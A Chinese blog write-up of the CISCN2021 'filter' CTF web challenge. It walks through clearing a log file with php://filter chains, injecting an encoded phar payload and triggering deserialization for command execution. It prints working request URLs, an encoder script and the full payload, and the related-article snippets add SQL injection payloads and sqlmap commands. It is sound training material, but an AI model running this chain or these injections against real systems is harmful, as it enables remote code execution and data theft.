CISCN2021_0解题目(filter)

最新推荐文章于 2024-06-04 14:18:54 发布
最新推荐文章于 2024-06-04 14:18:54 发布
阅读量761 收藏 1
点赞数 3
分类专栏: CTF复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anwen12/article/details/117094744
版权
本文档详述了一个利用过滤漏洞进行命令执行的过程。首先通过清除log文件的链子,然后构造特定的payload,通过编码转换绕过过滤。通过偶数文件名触发payload,最终实现命令执行。虽然题目难度不高,但涉及的技巧在实际安全攻防中有重要意义。
摘要由CSDN通过智能技术生成

CISCN2021_0解题目(filter)

0x01 题目初现

题目复现简单,压缩包解压

image-20210521002416691

这里可以关闭debugweb\index.php

image-20210521002447278

首先点开zip文件,这个不用多说

image-20210520231252891

然后还有hint

image-20210520231328447

再联想一下还和log文件有关,那个必定是larval rce那个漏洞相关了。那就不多说了,有兴趣的可以去看看

VNCTF2021 中的lar题目:https://blog.csdn.net/anwen12/article/details/115127075(这个挺详细

原cve分析:https://xz.aliyun.com/t/9165?page=1

这里面我们从里面拿几条常用的编码组合来消除阻挠

0x02 题目复现

感谢ma牛准备的链子,我直接舔了https://ma4ter.cn/2573.html

赛前准备

清空log文件

http://filter.com/index.php?r=site/index&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

链子生成payload

payload获取方式:

image-20210521001632203

from binascii import b2a_hex
payload = ""
armedPayload = ''
for i in payload:
    i = "="+b2a_hex(i.encode('utf-8')).decode('utf-8').upper()
    armedPayload += i+"=00"
print("123456789012345"+armedPayload)

payload

发送偶数文件名

http://filter.com/index.php?r=site/index&file=AA

注意这里的payload因为在传输的过程中,回出线

http://filter.com/index.php?r=site/index&file=123456789012345=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=45=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=74=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4D=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4A=00=68=00=64=00=47=00=4E=00=6F=00=55=00=58=00=56=00=6C=00=63=00=6E=00=6C=00=53=00=5A=00=58=00=4E=00=31=00=62=00=48=00=51=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=59=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=5A=00=47=00=4A=00=63=00=51=00=6D=00=46=00=30=00=59=00=32=00=68=00=52=00=64=00=57=00=56=00=79=00=65=00=56=00=4A=00=6C=00=63=00=33=00=56=00=73=00=64=00=41=00=42=00=66=00=5A=00=47=00=46=00=30=00=59=00=56=00=4A=00=6C=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4E=00=76=00=62=00=6D=00=35=00=6C=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=6F=00=69=00=63=00=47=00=52=00=76=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=63=00=32=00=34=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=59=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6B=00=59=00=6C=00=78=00=44=00=62=00=32=00=78=00=31=00=62=00=57=00=35=00=54=00=59=00=32=00=68=00=6C=00=62=00=57=00=46=00=43=00=64=00=57=00=6C=00=73=00=5A=00=47=00=56=00=79=00=49=00=6A=00=6F=00=79=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=52=00=35=00=63=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=65=00=43=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=54=00=6F=00=69=00=59=00=32=00=46=00=30=00=5A=00=57=00=64=00=76=00=63=00=6E=00=6C=00=4E=00=59=00=58=00=41=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=49=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6A=00=59=00=57=00=4E=00=6F=00=61=00=57=00=35=00=6E=00=58=00=45=00=46=00=79=00=63=00=6D=00=46=00=35=00=51=00=32=00=46=00=6A=00=61=00=47=00=55=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6E=00=4E=00=6C=00=63=00=6D=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4D=00=7A=00=41=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=59=00=32=00=46=00=6A=00=61=00=47=00=6C=00=75=00=5A=00=31=00=78=00=42=00=63=00=6E=00=4A=00=68=00=65=00=55=00=4E=00=68=00=59=00=32=00=68=00=6C=00=41=00=46=00=39=00=6A=00=59=00=57=00=4E=00=6F=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6E=00=67=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=4D=00=53=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=32=00=6B=00=36=00=4D=00=44=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4C=00=52=00=55=00=35=00=6E=00=6D=00=63=00=4E=00=77=00=34=00=66=00=63=00=6D=00=52=00=77=00=38=00=6B=00=42=00=70=00=51=00=63=00=4E=00=31=00=57=00=61=00=71=00=34=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00=0A=00

触发

http://filter.com/index.php?r=site/index&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

触发phar

http://filter.com/index.php?r=site/index&file=phar://../runtime/logs/app.log/1.txt

image-20210520232130942

日志清空成功。

如果不成功就再来一次。

发送偶数文件名

image-20210521001854158

发送payload

image-20210521001914808

完美触发

image-20210521001928636

命令执行完成

image-20210521001948918

0x03 题目吐槽

这个他题900分,截止日期又那么鬼畜,我就没做(当时就一个小时了呜呜)

但是这个题真的不难,远远比不上我Guoke大黑客的技术。

但是中间的偏移和偶数文件名这都是那个cve中讲到的,其实本身也不难,当时真的做一半交一半太垃圾了。

祝各位师傅们哈工大相见。

Dem0@
关注
专栏目录
CCNP350-401学习笔记(补充题目1-100)
shuyan1115的博客
03-04 1002
CCNP350-401学习笔记(2023.3.4)
CCIE重认证-300-410(选修)
stqer的博客
11-14 1077
有vrf forwarding Science就选。如果老二起来,避免它使用,就要用本地优先。promiscuous混杂的,无区别的。只选reported distance。telemetry data遥测数据。题干有VPN,只有正确选项有VPN。题干any,选项full。RSVP资源预留协议。
[CISCN2021]初赛
Huamang的博客
05-16 2007
easy_sql 无列名和报错注入 uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+ 出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307 uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(sele
WP-CISCN2021
热门推荐
ce666666的博客
06-14 1万+
前言 这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。 Web 简单的注入 一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。 还是得靠sqlmap注入 Payload: 爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs 爆表:sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名
CISCN 2021 题目复现
树木常青的博客
05-21 1609
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
CISCN2021】第十四届全国大学生信息安全竞赛初赛-writeup
../../../../../../../
05-17 4457
这一次比赛分为三张“卷子”,我就直接归在一起吧 场景实操Misctiny trafficrunning_pixel Misc tiny traffic 打开流量包 根据文件和题目描述,我们直接导出http对象 可以看到,列表里面含有gzip和br文件,Gzip是一种压缩文件格式并且也是一个在类 Unix 上的一种文件压缩的软件,BR文件是使用Brotli(一种开源数据压缩算法)压缩的文件 导出来后对这几个gzip和br文件压缩,先看看flag_wrapper 并没有啥实质性的内容 看看test和se
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn2021web0题目
05-21
【标题】"ciscn2021web0题目析"揭示了这是一份关于CISCO网络安全竞赛(可能是2021年)中的Web安全题目答资料。这个题目可能涉及了Web应用的安全漏洞、攻击手段以及防御策略。通过这份资源,学习者可以了...
软件测试-----经常问道的面试题目
qq_43475097的博客
12-04 2015
五个常见软件测试面试题及答案 具体某个项目的业务逻辑? 白箱测试和黑箱测试是什么? 什么是回归测试?简述下概念即可。 单元测试、集成测试、系统测试的侧重点是什么? 围绕重点简单概括即可。如下:单元测试的重点是系统的模块,包括子程序的正确性验证等。集成测试的重点是模块间的衔接以及参数的传递等。系统测试的重点是整个系统的运行以及与其他软件的兼容性。 白盒测试方法有 语句覆盖、判定覆盖、条件覆盖、判定/...
新华三网络工程师面试题汇总
最新发布
lijhqq的博客
06-04 1203
华为(华三)数通网络工程师面试汇总
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 862
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn_2019_n_3 题
lifanxin的博客
12-30 610
Write Up知识点关键字样本运行静态分析求思路求脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
【WP】CISCN2021初赛-WEB部分
車鈊的博客
06-06 802
WEB Easysql 模糊测试 发现columns,information,union(大小写)被过滤 报错回显点 UNION联合注入无法使用,测试登录发现报错点 回显位和库名 我们采用报错注入,用and做语法连接 // 测试列数 wyx123')and(select 1)# // 爆破库名 wyx123')and(select updatexml(1,concat(0x7e,database(),0x7e),1))# 列名的猜-无列名注入 当我们构造连接查询,对其加上using限制(using:
iscc2022+ciscn2022部分题目(栈题)复现
weixin_61283545的博客
06-11 1188
分析原代码后发现就是格式化字符串,没什么问题,值得注意的不知道为什么用recvuntil会有问题但是p.recv不会很疑惑,下次注意。 2.这道题可以看做上题的一个衍生,简单查看ida后发现循环输入在printf,且没有system,于是我们就想到改写printf的got表为system再输入bin执行。 这道题需要注意的是fmtstr.fmtstr_payload的写法!同时bin.sh经过学长指点还可以整花活,改成bin/bash同样也可以。3.跳一跳在此记录一下,基本题方法肯定为栈迁移+c
[CISCN2021 Quals]easy_sql
jiangdie666的博客
05-18 591
easy_SQL 界面无回显,1’有回显1’'可以绕过。 抓包,sqlmap跑了一下,库security表users字段id,username,password.但没有用。 看了一下,是报错注入,手注了了一下。 首先看fuzz检测一下过滤了什么 前四个都过滤掉了。 库名可以报错注入出来,但是由于from(information_schema.columns)where(table_name)被过滤了。 不能继续使用extractvalue爆表名字。换一种姿势。 无列名注入。 http://www.wupc
[CISCN2021 Quals]upload
jiangdie666的博客
05-18 2833
ciscn复现 学习自yu22x师傅博客 upload 这道题当天比赛,扫描后台发现了/example的页面,一共两篇源码,当时认为是利用example的源码,不适用index但是他题的意思是两个页面的源码都要利用起来,当天审计第一个页面的思路就是,先用ps创建一个图片大小为1*1的照片来过前两个检测,然后再修改照片里面的编码换成一句话木马,但是用于他有名字检测,所以没法继续进行。 学洗习了羽师傅的操作和想法,在buu上进行复现。 index.php <?php if (!isset($_GET["c
ciscn的简介
weixin_33840661的博客
03-31 1277
www.ciscn.cn 全国大学生信息安全竞赛官网教育部按照《教育部关于进一步加强信息安全学科、专业建设和人才培养工作的意见》(教高〔2005〕7号)的要求及《教育部关于成立2006-2010年教育部高等学校有关科类教学指导委员会的通知》(教高函〔2005〕25号)的有关工作安排,为加强教育部对高等学校信息安全人才培养工作的宏观指导与管理,充分发挥专家学者对信息安全...
Laravel Debug mode 远程代码执行(CVE-2021-3129)
jammny
01-30 3447
漏洞详情 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 漏洞影响 Laravel <= 8.4.2 Ignition <= 2.5.1 漏洞利用 下载靶场:gi
Cisco 1841路由器密码破步骤详
在本文档中,主要讨论了如何对Cisco路由器1841进行密码破的过程,这是一种针对网络设备常见安全措施的一种技术手段。首先,由于路由器通常需要密码访问,当用户无法通过默认或已知密码登录时,可以采取以下步骤...
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值